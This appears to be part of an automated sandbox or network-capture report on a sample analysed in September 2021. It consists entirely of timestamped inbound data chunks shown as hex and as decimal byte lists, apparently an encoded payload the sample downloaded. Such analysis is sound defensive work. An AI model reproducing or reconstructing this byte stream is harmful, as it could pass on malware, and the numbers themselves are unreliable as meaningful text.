                                                                                              2021-09-27 18:27:44 UTC1883INData Raw: 31 30 20 38 30 20 31 33 39 20 31 30 39 20 32 31 38 20 35 31 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 33 20 31 31 37 20 34 33 20 31 31 35 20 32 34 32 20 31 38 20 32 31 36 20 34 38 20 32 35 35 20 31 31 35 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 35 31 20 35 30 20 34 38 20 37 36 20 31 32 39 20 31 31 31 20 31 33 31 20 31 31 32 20 31 35 36 20 34 39 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 38 20 31 30 39 20 35 34 20 34 39 20 32 30 36 20 31 39 20 31 39 35 20 38 32 20 31 39 34 20 31 31 36 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 34 39 20 35 34 20 31 38 20 31 31 33 20 32 34 33 20 37 39 20 31 34 32 20 35 30 20 31 33 32 20 35 31 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 31 30 20 31 31 32 20 31 31 36 20 35 31 20 32 34 32 20 32 30 20 38 36
                                                                                              Data Ascii: 10 80 139 109 218 51 48 50 54 84 113 117 43 115 242 18 216 48 255 115 117 109 112 50 51 50 48 76 129 111 131 112 156 49 50 54 84 114 118 109 54 49 206 19 195 82 194 116 109 112 50 48 49 54 18 113 243 79 142 50 132 51 54 84 114 117 110 112 116 51 242 20 86
                                                                                              2021-09-27 18:27:44 UTC1888INData Raw: 31 31 32 20 35 30 20 35 32 20 35 30 20 39 39 20 34 20 31 31 34 20 31 31 37 20 31 30 34 20 31 31 32 20 31 38 39 20 32 32 20 35 30 20 35 34 20 38 35 20 31 31 34 20 31 37 32 20 36 31 20 31 31 32 20 35 30 20 34 39 20 35 30 20 31 39 20 35 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 37 39 20 39 37 20 35 30 20 35 34 20 38 35 20 31 31 34 20 31 39 36 20 36 30 20 31 31 32 20 35 30 20 34 39 20 35 30 20 37 35 20 35 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 31 39 20 39 38 20 35 30 20 35 34 20 38 35 20 31 31 34 20 32 35 32 20 36 33 20 31 31 32 20 35 30 20 35 30 20 35 30 20 31 34 37 20 36 20 31 31 34 20 31 31 37 20 31 31 30 20 31 31 32 20 32 34 33 20 39 38 20 35 30 20 35 34 20 38 35 20 31 31 34 20 31 34 30 20 36 33 20 31 31 32 20 35 30 20 34 39 20 35 30
                                                                                              Data Ascii: 112 50 52 50 99 4 114 117 104 112 189 22 50 54 85 114 172 61 112 50 49 50 19 5 114 117 108 112 79 97 50 54 85 114 196 60 112 50 49 50 75 5 114 117 108 112 19 98 50 54 85 114 252 63 112 50 50 50 147 6 114 117 110 112 243 98 50 54 85 114 140 63 112 50 49 50
                                                                                              2021-09-27 18:27:44 UTC1892INData Raw: 37 20 35 30 20 35 34 20 38 35 20 31 31 34 20 32 32 35 20 32 35 30 20 31 31 32 20 35 30 20 34 39 20 35 30 20 32 35 30 20 31 39 35 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 31 38 20 31 36 38 20 35 30 20 35 34 20 38 36 20 31 31 34 20 37 33 20 32 34 35 20 31 31 32 20 35 30 20 34 39 20 35 30 20 36 36 20 32 30 34 20 31 31 34 20 31 31 37 20 31 31 31 20 31 31 32 20 31 36 32 20 31 36 38 20 35 30 20 35 34 20 38 37 20 31 31 34 20 32 31 37 20 32 34 35 20 31 31 32 20 35 30 20 34 39 20 35 30 20 32 31 30 20 32 30 34 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 39 30 20 31 36 39 20 35 30 20 35 34 20 38 36 20 31 31 34 20 32 34 31 20 32 34 34 20 31 31 32 20 35 30 20 34 39 20 35 30 20 32 33 30 20 32 30 35 20 31 31 34 20 31 31 37 20 31 30 38 20 31 31 32 20 34
                                                                                              Data Ascii: 7 50 54 85 114 225 250 112 50 49 50 250 195 114 117 108 112 18 168 50 54 86 114 73 245 112 50 49 50 66 204 114 117 111 112 162 168 50 54 87 114 217 245 112 50 49 50 210 204 114 117 108 112 90 169 50 54 86 114 241 244 112 50 49 50 230 205 114 117 108 112 4
                                                                                              2021-09-27 18:27:44 UTC1896INData Raw: 33 36 20 31 31 31 20 32 34 36 20 31 35 35 20 38 37 20 35 30 20 31 30 36 20 38 34 20 32 33 39 20 32 32 30 20 32 34 31 20 31 31 32 20 31 31 30 20 34 38 20 31 33 32 20 31 35 39 20 37 38 20 31 32 30 20 32 35 20 31 30 39 20 31 33 31 20 34 30 20 38 37 20 35 30 20 39 30 20 38 34 20 36 32 20 32 32 30 20 39 39 20 31 32 32 20 31 37 39 20 34 38 20 32 30 36 20 31 35 39 20 38 31 20 31 31 35 20 32 34 34 20 31 30 39 20 31 32 34 20 31 35 32 20 35 33 20 35 31 20 31 39 31 20 38 34 20 38 33 20 32 32 33 20 31 30 20 31 31 32 20 31 38 37 20 34 38 20 31 20 31 35 36 20 31 31 35 20 31 31 35 20 32 35 32 20 31 30 39 20 35 32 20 31 35 32 20 32 39 20 35 31 20 31 39 31 20 38 34 20 39 32 20 32 34 30 20 31 30 34 20 31 31 33 20 31 38 37 20 34 38 20 31 30 35 20 31 35 36 20 38 31 20 31 31
                                                                                              Data Ascii: 36 111 246 155 87 50 106 84 239 220 241 112 110 48 132 159 78 120 25 109 131 40 87 50 90 84 62 220 99 122 179 48 206 159 81 115 244 109 124 152 53 51 191 84 83 223 10 112 187 48 1 156 115 115 252 109 52 152 29 51 191 84 92 240 104 113 187 48 105 156 81 11
                                                                                              2021-09-27 18:27:44 UTC1900INData Raw: 20 31 35 37 20 39 32 20 34 38 20 31 31 31 20 38 31 20 31 30 20 32 31 36 20 32 31 20 31 32 37 20 37 38 20 34 38 20 31 37 35 20 31 35 39 20 32 30 30 20 31 31 34 20 39 20 31 30 39 20 32 30 36 20 31 35 35 20 31 37 32 20 35 37 20 32 32 36 20 38 34 20 31 39 30 20 32 32 30 20 31 39 37 20 31 32 33 20 32 33 38 20 34 38 20 31 32 30 20 31 35 37 20 31 34 34 20 31 32 31 20 31 36 31 20 31 30 39 20 31 33 31 20 31 35 35 20 39 20 35 31 20 37 34 20 38 34 20 33 38 20 32 32 32 20 31 30 20 31 31 32 20 37 38 20 34 38 20 37 37 20 31 35 39 20 31 31 30 20 31 32 30 20 36 38 20 31 31 31 20 34 35 20 31 35 37 20 31 35 30 20 35 30 20 31 31 31 20 38 31 20 33 30 20 32 31 38 20 32 30 33 20 31 31 32 20 31 36 33 20 34 39 20 36 37 20 31 35 33 20 32 30 30 20 31 31 34 20 31 32 34 20 31 31 30
                                                                                              Data Ascii: 157 92 48 111 81 10 216 21 127 78 48 175 159 200 114 9 109 206 155 172 57 226 84 190 220 197 123 238 48 120 157 144 121 161 109 131 155 9 51 74 84 38 222 10 112 78 48 77 159 110 120 68 111 45 157 150 50 111 81 30 218 203 112 163 49 67 153 200 114 124 110
                                                                                              2021-09-27 18:27:44 UTC1904INData Raw: 39 20 31 34 39 20 31 35 39 20 36 33 20 31 31 34 20 31 34 30 20 31 30 39 20 31 37 37 20 31 35 38 20 31 35 31 20 33 39 20 39 35 20 38 37 20 33 20 31 39 38 20 32 34 31 20 31 31 32 20 39 31 20 35 31 20 31 36 39 20 31 33 32 20 31 32 34 20 39 37 20 32 30 20 31 31 30 20 31 32 20 31 32 39 20 31 31 33 20 33 39 20 38 37 20 38 37 20 32 30 32 20 32 32 33 20 31 30 20 31 31 32 20 35 34 20 34 39 20 31 30 32 20 31 35 37 20 35 31 20 31 31 34 20 34 20 31 30 35 20 32 34 36 20 31 32 39 20 32 32 36 20 33 39 20 32 30 37 20 38 34 20 32 33 31 20 31 39 38 20 31 33 33 20 31 30 31 20 33 20 35 31 20 31 39 33 20 34 34 20 38 33 20 31 31 38 20 35 32 20 31 30 37 20 31 33 31 20 34 30 20 38 37 20 35 30 20 31 30 33 20 38 32 20 31 32 39 20 31 31 31 20 31 33 31 20 31 31 32 20 31 31 35 20 35
                                                                                              Data Ascii: 9 149 159 63 114 140 109 177 158 151 39 95 87 3 198 241 112 91 51 169 132 124 97 20 110 12 129 113 39 87 87 202 223 10 112 54 49 102 157 51 114 4 105 246 129 226 39 207 84 231 198 133 101 3 51 193 44 83 118 52 107 131 40 87 50 103 82 129 111 131 112 115 5
                                                                                              2021-09-27 18:27:45 UTC1915INData Raw: 39 31 20 39 35 20 39 32 20 35 34 20 31 36 20 32 33 20 31 39 20 31 20 31 37 20 37 30 20 38 35 20 39 37 20 36 36 20 33 38 20 32 33 20 32 30 20 30 20 31 31 32 20 31 31 38 20 38 39 20 36 34 20 38 33 20 35 35 20 36 20 32 36 20 33 31 20 39 20 35 30 20 31 31 36 20 39 31 20 36 38 20 34 39 20 31 37 20 31 20 32 20 32 20 37 35 20 31 32 31 20 39 32 20 38 30 20 35 39 20 31 31 34 20 34 38 20 33 20 32 30 20 31 32 35 20 38 36 20 39 37 20 36 36 20 33 38 20 32 33 20 32 30 20 30 20 35 33 20 37 34 20 38 33 20 38 37 20 37 30 20 33 32 20 32 37 20 32 36 20 33 20 31 31 32 20 31 31 36 20 38 39 20 39 34 20 38 33 20 38 34 20 35 32 20 32 38 20 31 20 32 31 20 31 31 35 20 38 33 20 38 31 20 38 33 20 33 39 20 31 20 31 31 37 20 34 33 20 32 35 20 39 34 20 38 35 20 31 32 33 20 38 38 20 35
                                                                                              Data Ascii: 91 95 92 54 16 23 19 1 17 70 85 97 66 38 23 20 0 112 118 89 64 83 55 6 26 31 9 50 116 91 68 49 17 1 2 2 75 121 92 80 59 114 48 3 20 125 86 97 66 38 23 20 0 53 74 83 87 70 32 27 26 3 112 116 89 94 83 84 52 28 1 21 115 83 81 83 39 1 117 43 25 94 85 123 88 5
                                                                                              2021-09-27 18:27:45 UTC1931INData Raw: 33 38 20 33 35 20 32 39 20 35 20 38 20 31 31 33 20 38 34 20 39 35 20 31 35 20 39 37 20 36 32 20 36 38 20 34 32 20 31 38 20 31 30 20 33 20 39 35 20 31 32 35 20 31 39 20 35 38 20 36 38 20 35 39 20 38 20 39 39 20 31 33 20 35 30 20 32 31 20 31 30 35 20 33 20 33 36 20 38 34 20 32 33 20 38 37 20 37 30 20 39 37 20 31 20 35 34 20 37 30 20 32 36 20 35 37 20 33 20 38 36 20 37 32 20 37 30 20 39 36 20 31 30 33 20 36 38 20 32 32 20 39 34 20 38 34 20 31 31 35 20 31 33 20 31 35 20 35 34 20 31 31 39 20 37 39 20 34 20 32 30 20 31 39 20 32 20 31 30 35 20 39 39 20 31 30 32 20 32 36 20 33 20 33 34 20 32 36 20 34 32 20 31 32 32 20 39 31 20 38 35 20 31 32 30 20 31 36 20 33 36 20 37 37 20 31 20 39 20 31 32 33 20 39 37 20 38 34 20 38 31 20 32 35 20 32 35 20 34 38 20 31 35 20 35
                                                                                              Data Ascii: 38 35 29 5 8 113 84 95 15 97 62 68 42 18 10 3 95 125 19 58 68 59 8 99 13 50 21 105 3 36 84 23 87 70 97 1 54 70 26 57 3 86 72 70 96 103 68 22 94 84 115 13 15 54 119 79 4 20 19 2 105 99 102 26 3 34 26 42 122 91 85 120 16 36 77 1 9 123 97 84 81 25 25 48 15 5
                                                                                              2021-09-27 18:27:45 UTC1947INData Raw: 31 35 20 35 34 20 36 20 32 33 20 32 34 20 32 20 36 20 38 37 20 31 30 32 20 38 33 20 39 30 20 33 33 20 32 33 20 31 31 37 20 37 38 20 37 37 20 36 37 20 37 20 31 30 37 20 31 31 35 20 31 38 20 31 20 33 39 20 34 34 20 36 35 20 31 31 20 31 30 36 20 36 34 20 37 38 20 33 31 20 33 38 20 35 35 20 38 20 36 30 20 32 32 20 37 33 20 32 20 38 30 20 35 31 20 37 39 20 37 32 20 31 30 39 20 35 33 20 39 32 20 36 38 20 36 34 20 37 39 20 31 37 20 31 30 20 32 38 20 33 30 20 34 20 36 35 20 34 38 20 31 31 37 20 38 33 20 33 32 20 35 35 20 32 37 20 32 35 20 32 20 39 31 20 38 35 20 36 35 20 35 34 20 31 31 39 20 37 39 20 34 20 39 35 20 32 33 20 37 30 20 38 38 20 36 38 20 31 31 36 20 39 38 20 36 34 20 32 37 20 39 33 20 37 31 20 38 34 20 31 30 35 20 31 30 30 20 39 38 20 34 34 20 37 31
                                                                                              Data Ascii: 15 54 6 23 24 2 6 87 102 83 90 33 23 117 78 77 67 7 107 115 18 1 39 44 65 11 106 64 78 31 38 55 8 60 22 73 2 80 51 79 72 109 53 92 68 64 79 17 10 28 30 4 65 48 117 83 32 55 27 25 2 91 85 65 54 119 79 4 95 23 70 88 68 116 98 64 27 93 71 84 105 100 98 44 71
                                                                                              2021-09-27 18:27:45 UTC1963INData Raw: 20 39 38 20 35 31 20 37 30 20 33 36 20 32 38 20 31 31 37 20 38 38 20 31 31 35 20 31 32 30 20 32 33 20 32 32 20 33 30 20 35 36 20 35 34 20 31 31 33 20 38 37 20 36 38 20 31 31 35 20 36 31 20 35 20 37 32 20 31 30 39 20 38 33 20 31 35 20 36 35 20 39 36 20 38 34 20 31 36 20 31 30 20 35 39 20 33 35 20 34 37 20 31 31 33 20 31 31 34 20 36 36 20 39 32 20 34 38 20 32 38 20 36 38 20 39 32 20 32 34 20 38 38 20 36 38 20 31 30 31 20 38 39 20 31 34 20 32 31 20 37 32 20 38 30 20 31 31 32 20 31 37 20 31 33 20 36 37 20 37 36 20 36 20 31 37 20 33 36 20 35 30 20 31 38 20 31 30 20 31 31 38 20 39 33 20 39 38 20 35 36 20 32 20 36 32 20 35 37 20 34 37 20 31 31 32 20 31 32 37 20 38 30 20 36 39 20 35 31 20 34 38 20 32 35 20 39 35 20 31 38 20 38 38 20 37 20 33 20 36 35 20 31 20 37
                                                                                              Data Ascii: 98 51 70 36 28 117 88 115 120 23 22 30 56 54 113 87 68 115 61 5 72 109 83 15 65 96 84 16 10 59 35 47 113 114 66 92 48 28 68 92 24 88 68 101 89 14 21 72 80 112 17 13 67 76 6 17 36 50 18 10 118 93 98 56 2 62 57 47 112 127 80 69 51 48 25 95 18 88 7 3 65 1 7
                                                                                              2021-09-27 18:27:45 UTC1979INData Raw: 35 20 31 31 34 20 38 36 20 38 30 20 31 20 31 30 39 20 31 30 34 20 31 31 35 20 33 20 36 30 20 36 34 20 32 35 20 35 39 20 35 35 20 31 32 32 20 31 32 34 20 38 31 20 31 31 31 20 31 30 39 20 32 32 20 36 32 20 39 30 20 36 39 20 36 20 37 31 20 31 32 31 20 31 31 33 20 33 38 20 36 31 20 33 31 20 34 34 20 32 39 20 34 20 38 31 20 31 31 32 20 38 34 20 33 35 20 33 34 20 31 33 20 31 34 20 33 37 20 31 32 30 20 31 30 34 20 38 35 20 31 32 34 20 30 20 32 36 20 36 33 20 35 36 20 31 30 20 31 30 20 33 20 38 39 20 31 32 33 20 35 34 20 34 39 20 35 37 20 38 38 20 36 37 20 31 31 37 20 35 20 37 31 20 36 37 20 32 37 20 36 32 20 33 37 20 39 31 20 33 34 20 36 37 20 34 38 20 31 37 20 31 31 20 33 37 20 32 35 20 38 31 20 31 34 20 30 20 38 36 20 39 34 20 34 20 36 39 20 34 39 20 33 20 32
                                                                                              Data Ascii: 5 114 86 80 1 109 104 115 3 60 64 25 59 55 122 124 81 111 109 22 62 90 69 6 71 121 113 38 61 31 44 29 4 81 112 84 35 34 13 14 37 120 104 85 124 0 26 63 56 10 10 3 89 123 54 49 57 88 67 117 5 71 67 27 62 37 91 34 67 48 17 11 37 25 81 14 0 86 94 4 69 49 3 2
                                                                                              2021-09-27 18:27:45 UTC1995INData Raw: 32 20 37 37 20 35 30 20 31 39 20 31 35 20 37 31 20 32 31 20 33 32 20 37 36 20 31 32 20 35 34 20 31 31 36 20 39 37 20 39 38 20 31 31 35 20 35 39 20 34 20 35 20 34 33 20 31 30 20 36 38 20 38 36 20 39 33 20 39 33 20 35 39 20 35 33 20 33 30 20 32 36 20 37 37 20 31 35 20 34 38 20 31 37 20 31 31 20 33 37 20 33 34 20 33 31 20 36 31 20 35 36 20 31 30 31 20 31 30 34 20 31 31 37 20 38 34 20 35 33 20 35 31 20 38 31 20 38 38 20 36 35 20 31 31 33 20 39 34 20 38 33 20 34 20 31 34 20 31 39 20 35 36 20 32 39 20 33 33 20 31 35 20 31 33 20 35 30 20 32 31 20 31 30 35 20 33 20 33 32 20 35 38 20 34 31 20 31 31 32 20 36 39 20 38 31 20 38 32 20 31 32 20 30 20 34 20 33 31 20 36 36 20 31 32 31 20 36 37 20 38 31 20 31 30 35 20 31 30 33 20 33 20 36 32 20 35 35 20 31 39 20 31 31 35
                                                                                              Data Ascii: 2 77 50 19 15 71 21 32 76 12 54 116 97 98 115 59 4 5 43 10 68 86 93 93 59 53 30 26 77 15 48 17 11 37 34 31 61 56 101 104 117 84 53 51 81 88 65 113 94 83 4 14 19 56 29 33 15 13 50 21 105 3 32 58 41 112 69 81 82 12 0 4 31 66 121 67 81 105 103 3 62 55 19 115
                                                                                              2021-09-27 18:27:45 UTC2011INData Raw: 31 20 31 32 31 20 32 30 20 35 20 36 20 31 30 32 20 32 38 20 33 30 20 32 33 20 33 33 20 36 20 36 36 20 39 39 20 36 20 35 36 20 35 36 20 35 37 20 36 30 20 34 32 20 30 20 37 34 20 38 33 20 36 35 20 31 30 35 20 37 39 20 31 31 37 20 37 38 20 37 37 20 36 37 20 31 32 35 20 31 32 37 20 39 33 20 36 30 20 34 38 20 36 20 35 30 20 37 32 20 36 38 20 36 38 20 38 34 20 32 20 31 30 39 20 37 34 20 37 36 20 32 38 20 35 31 20 31 32 37 20 36 20 31 30 32 20 39 39 20 33 35 20 37 39 20 37 32 20 31 30 39 20 33 34 20 38 37 20 36 37 20 37 30 20 38 37 20 33 38 20 36 20 31 31 37 20 36 32 20 32 34 20 37 31 20 36 38 20 38 36 20 38 39 20 33 35 20 32 38 20 31 31 37 20 34 31 20 32 35 20 36 35 20 38 31 20 38 30 20 39 30 20 34 39 20 33 34 20 37 20 32 20 34 20 38 37 20 38 33 20 37 30 20 39
                                                                                              Data Ascii: 1 121 20 5 6 102 28 30 23 33 6 66 99 6 56 56 57 60 42 0 74 83 65 105 79 117 78 77 67 125 127 93 60 48 6 50 72 68 68 84 2 109 74 76 28 51 127 6 102 99 35 79 72 109 34 87 67 70 87 38 6 117 62 24 71 68 86 89 35 28 117 41 25 65 81 80 90 49 34 7 2 4 87 83 70 9
                                                                                              2021-09-27 18:27:45 UTC2027INData Raw: 20 38 31 20 39 34 20 31 20 32 36 20 32 33 20 33 20 32 36 20 31 32 31 20 36 38 20 31 32 32 20 38 38 20 36 20 31 20 32 32 20 36 20 36 31 20 35 20 31 32 31 20 36 20 31 30 38 20 33 37 20 31 37 20 32 20 31 31 20 33 33 20 31 32 35 20 38 20 31 31 39 20 31 31 20 38 34 20 38 31 20 37 32 20 32 38 20 35 37 20 30 20 36 34 20 31 31 35 20 36 38 20 31 30 39 20 36 34 20 32 33 20 36 33 20 32 30 20 37 32 20 38 34 20 38 36 20 38 37 20 33 36 20 33 36 20 32 30 20 36 31 20 33 38 20 39 30 20 38 32 20 39 39 20 31 31 20 31 30 35 20 31 31 34 20 38 36 20 38 30 20 31 20 31 30 20 37 32 20 38 30 20 36 37 20 33 31 20 36 39 20 35 20 32 38 20 39 20 36 37 20 37 20 39 35 20 39 37 20 32 32 20 36 38 20 36 36 20 32 37 20 36 20 39 31 20 31 31 34 20 37 30 20 31 32 31 20 35 39 20 36 37 20 33 34
                                                                                              Data Ascii: 81 94 1 26 23 3 26 121 68 122 88 6 1 22 6 61 5 121 6 108 37 17 2 11 33 125 8 119 11 84 81 72 28 57 0 64 115 68 109 64 23 63 20 72 84 86 87 36 36 20 61 38 90 82 99 11 105 114 86 80 1 10 72 80 67 31 69 5 28 9 67 7 95 97 22 68 66 27 6 91 114 70 121 59 67 34
                                                                                              2021-09-27 18:27:45 UTC2043INData Raw: 37 20 31 30 32 20 38 33 20 39 30 20 33 33 20 32 33 20 31 31 37 20 31 30 20 32 31 20 37 30 20 31 31 31 20 31 31 39 20 37 38 20 35 35 20 32 33 20 35 20 32 35 20 32 35 20 39 33 20 39 34 20 31 32 35 20 38 34 20 36 32 20 32 33 20 32 32 20 32 35 20 31 31 32 20 38 35 20 38 35 20 37 30 20 31 30 35 20 31 37 20 31 30 20 32 32 20 38 20 30 20 37 30 20 38 39 20 39 33 20 38 38 20 38 34 20 33 38 20 32 36 20 33 33 20 33 31 20 36 39 20 38 35 20 36 34 20 35 34 20 35 31 20 32 33 20 31 20 35 30 20 36 32 20 38 33 20 39 33 20 38 37 20 35 34 20 37 20 36 20 32 30 20 33 31 20 34 20 36 35 20 31 30 33 20 39 31 20 36 36 20 36 30 20 31 31 34 20 35 37 20 32 20 31 37 20 38 36 20 34 38 20 38 35 20 38 33 20 33 32 20 34 35 20 35 39 20 32 20 37 20 35 30 20 31 31 33 20 38 36 20 38 32 20 32
                                                                                              Data Ascii: 7 102 83 90 33 23 117 10 21 70 111 119 78 55 23 5 25 25 93 94 125 84 62 23 22 25 112 85 85 70 105 17 10 22 8 0 70 89 93 88 84 38 26 33 31 69 85 64 54 51 23 1 50 62 83 93 87 54 7 6 20 31 4 65 103 91 66 60 114 57 2 17 86 48 85 83 32 45 59 2 7 50 113 86 82 2
                                                                                              2021-09-27 18:27:45 UTC2059INData Raw: 32 35 31 20 33 39 20 32 31 32 20 31 38 37 20 31 32 33 20 31 31 32 20 31 31 37 20 33 32 20 31 37 37 20 34 33 20 34 38 20 38 34 20 31 31 32 20 31 32 37 20 31 31 32 20 31 31 37 20 35 38 20 35 34 20 35 30 20 35 35 20 36 39 20 32 34 32 20 31 38 38 20 31 30 33 20 31 31 37 20 35 30 20 34 39 20 34 37 20 35 31 20 39 34 20 31 32 32 20 31 31 34 20 31 30 35 20 31 32 36 20 36 30 20 36 32 20 33 32 20 31 38 33 20 37 37 20 31 31 36 20 31 31 34 20 31 31 31 20 31 32 36 20 33 32 20 31 37 37 20 34 33 20 35 31 20 38 34 20 31 31 32 20 31 31 36 20 39 39 20 31 32 36 20 33 33 20 35 35 20 35 34 20 33 36 20 32 31 32 20 31 34 36 20 31 30 33 20 32 33 37 20 31 34 34 20 33 32 20 31 37 37 20 31 37 31 20 33 35 20 37 30 20 32 34 32 20 32 32 30 20 31 30 38 20 39 38 20 31 37 39 20 31 36 39
                                                                                              Data Ascii: 251 39 212 187 123 112 117 32 177 43 48 84 112 127 112 117 58 54 50 55 69 242 188 103 117 50 49 47 51 94 122 114 105 126 60 62 32 183 77 116 114 111 126 32 177 43 51 84 112 116 99 126 33 55 54 36 212 146 103 237 144 32 177 171 35 70 242 220 108 98 179 169
                                                                                              2021-09-27 18:27:45 UTC2075INData Raw: 36 33 20 31 37 39 20 31 30 34 20 32 20 38 20 31 31 20 31 20 31 33 31 20 36 36 20 31 38 30 20 32 33 33 20 31 38 20 31 32 38 20 39 39 20 31 35 34 20 32 33 33 20 36 38 20 31 33 38 20 32 35 35 20 32 31 36 20 37 20 32 32 39 20 31 31 36 20 39 35 20 31 39 38 20 34 34 20 38 39 20 32 37 20 32 31 38 20 34 32 20 35 34 20 32 34 35 20 31 33 39 20 31 32 39 20 31 36 33 20 31 31 20 31 39 32 20 39 34 20 32 33 35 20 32 31 34 20 31 30 32 20 37 34 20 31 36 30 20 35 37 20 32 32 34 20 31 35 34 20 32 30 32 20 38 34 20 31 39 34 20 39 37 20 31 38 33 20 31 32 36 20 32 30 33 20 31 32 38 20 31 33 34 20 32 32 31 20 31 39 30 20 31 35 35 20 31 38 39 20 31 30 30 20 38 20 36 32 20 32 32 30 20 31 37 36 20 31 32 35 20 36 39 20 32 36 20 32 32 20 32 31 34 20 32 32 36 20 32 33 38 20 31 32 32
                                                                                              Data Ascii: 63 179 104 2 8 11 1 131 66 180 233 18 128 99 154 233 68 138 255 216 7 229 116 95 198 44 89 27 218 42 54 245 139 129 163 11 192 94 235 214 102 74 160 57 224 154 202 84 194 97 183 126 203 128 134 221 190 155 189 100 8 62 220 176 125 69 26 22 214 226 238 122
                                                                                              2021-09-27 18:27:45 UTC2091INData Raw: 20 31 30 37 20 36 38 20 31 31 37 20 32 31 20 33 37 20 32 20 32 32 36 20 31 37 36 20 31 30 32 20 34 35 20 35 35 20 35 39 20 34 33 20 38 32 20 31 34 30 20 33 35 20 34 36 20 39 34 20 32 33 39 20 36 31 20 31 38 33 20 31 34 32 20 39 36 20 37 38 20 30 20 32 31 37 20 32 35 31 20 35 30 20 32 33 31 20 31 34 33 20 32 32 32 20 31 32 31 20 32 31 34 20 31 33 33 20 31 35 30 20 32 33 32 20 38 38 20 38 33 20 39 35 20 32 34 20 33 38 20 31 36 31 20 31 38 31 20 32 31 20 32 31 34 20 31 36 30 20 37 31 20 32 30 38 20 32 32 36 20 37 20 31 34 37 20 31 34 38 20 31 33 32 20 31 36 37 20 31 32 31 20 31 32 36 20 32 33 20 32 20 32 31 38 20 31 32 37 20 32 30 30 20 35 35 20 31 37 30 20 38 39 20 36 20 32 34 34 20 31 20 31 35 39 20 32 34 30 20 31 33 34 20 32 30 37 20 38 34 20 31 34 34 20
                                                                                              Data Ascii: 107 68 117 21 37 2 226 176 102 45 55 59 43 82 140 35 46 94 239 61 183 142 96 78 0 217 251 50 231 143 222 121 214 133 150 232 88 83 95 24 38 161 181 21 214 160 71 208 226 7 147 148 132 167 121 126 23 2 218 127 200 55 170 89 6 244 1 159 240 134 207 84 144
                                                                                              2021-09-27 18:27:45 UTC2107INData Raw: 31 31 33 20 32 35 20 31 32 37 20 32 35 30 20 31 31 30 20 33 37 20 31 38 34 20 31 34 38 20 30 20 37 33 20 38 39 20 33 37 20 34 38 20 31 31 38 20 31 30 20 32 31 39 20 31 37 36 20 38 39 20 36 39 20 31 39 30 20 36 37 20 31 33 37 20 31 37 38 20 32 35 35 20 35 36 20 32 30 33 20 32 35 31 20 31 32 33 20 31 38 39 20 32 34 34 20 32 30 32 20 31 37 34 20 33 20 32 33 39 20 31 37 30 20 31 33 33 20 36 35 20 31 33 20 37 34 20 31 37 34 20 31 31 35 20 31 33 34 20 31 39 39 20 31 39 37 20 31 34 32 20 32 30 33 20 31 36 39 20 31 37 38 20 31 38 34 20 32 37 20 33 36 20 31 37 20 36 37 20 31 34 35 20 35 32 20 31 37 31 20 32 31 33 20 36 33 20 38 34 20 31 34 20 31 34 31 20 31 35 35 20 38 35 20 32 33 31 20 35 35 20 31 38 35 20 31 31 36 20 31 32 35 20 35 37 20 31 39 39 20 31 39 34 20
                                                                                              Data Ascii: 113 25 127 250 110 37 184 148 0 73 89 37 48 118 10 219 176 89 69 190 67 137 178 255 56 203 251 123 189 244 202 174 3 239 170 133 65 13 74 174 115 134 199 197 142 203 169 178 184 27 36 17 67 145 52 171 213 63 84 14 141 155 85 231 55 185 116 125 57 199 194
                                                                                              2021-09-27 18:27:45 UTC2123INData Raw: 20 33 34 20 31 31 20 32 34 38 20 38 20 32 31 39 20 34 30 20 31 34 38 20 31 34 30 20 31 37 31 20 32 34 33 20 33 33 20 32 31 31 20 31 31 34 20 33 30 20 31 34 33 20 38 32 20 32 31 30 20 31 36 35 20 32 33 20 32 34 34 20 31 35 36 20 32 32 32 20 33 32 20 39 30 20 31 20 31 30 36 20 35 34 20 32 38 20 34 36 20 32 30 36 20 32 32 30 20 31 39 30 20 32 33 34 20 38 36 20 32 31 20 30 20 31 32 35 20 31 20 32 34 34 20 31 34 30 20 31 33 34 20 39 32 20 39 20 33 36 20 31 33 38 20 35 35 20 39 33 20 35 33 20 31 37 37 20 32 33 32 20 34 34 20 32 31 32 20 32 35 20 33 39 20 32 30 35 20 34 36 20 31 37 38 20 31 36 34 20 31 32 36 20 32 31 20 31 38 30 20 31 35 38 20 33 35 20 32 32 36 20 31 34 36 20 32 31 39 20 38 34 20 31 30 38 20 31 35 35 20 33 33 20 32 35 34 20 32 32 30 20 32 35 30
                                                                                              Data Ascii: 34 11 248 8 219 40 148 140 171 243 33 211 114 30 143 82 210 165 23 244 156 222 32 90 1 106 54 28 46 206 220 190 234 86 21 0 125 1 244 140 134 92 9 36 138 55 93 53 177 232 44 212 25 39 205 46 178 164 126 21 180 158 35 226 146 219 84 108 155 33 254 220 250
                                                                                              2021-09-27 18:27:45 UTC2139INData Raw: 38 20 38 30 20 35 20 31 34 32 20 31 39 20 31 39 20 32 30 39 20 31 39 36 20 37 35 20 32 34 33 20 32 32 37 20 32 35 20 32 31 30 20 31 36 38 20 39 34 20 36 37 20 31 38 20 32 33 35 20 32 20 32 30 34 20 38 31 20 37 38 20 38 30 20 31 37 30 20 31 37 20 31 35 33 20 31 32 33 20 39 34 20 31 32 31 20 31 37 35 20 36 31 20 32 33 36 20 31 38 38 20 31 33 35 20 31 31 36 20 37 39 20 32 32 34 20 34 33 20 31 38 20 39 35 20 31 32 36 20 32 30 34 20 35 20 31 34 32 20 32 32 30 20 31 31 31 20 31 34 31 20 31 34 34 20 31 30 20 31 34 37 20 35 31 20 31 31 34 20 32 39 20 31 39 31 20 32 31 30 20 32 34 37 20 31 36 34 20 31 36 37 20 31 31 32 20 31 30 38 20 33 31 20 32 31 20 33 36 20 32 33 31 20 31 36 37 20 35 31 20 37 31 20 31 30 30 20 35 32 20 32 32 20 32 34 31 20 31 35 32 20 32 34 32
                                                                                              Data Ascii: 8 80 5 142 19 19 209 196 75 243 227 25 210 168 94 67 18 235 2 204 81 78 80 170 17 153 123 94 121 175 61 236 188 135 116 79 224 43 18 95 126 204 5 142 220 111 141 144 10 147 51 114 29 191 210 247 164 167 112 108 31 21 36 231 167 51 71 100 52 22 241 152 242
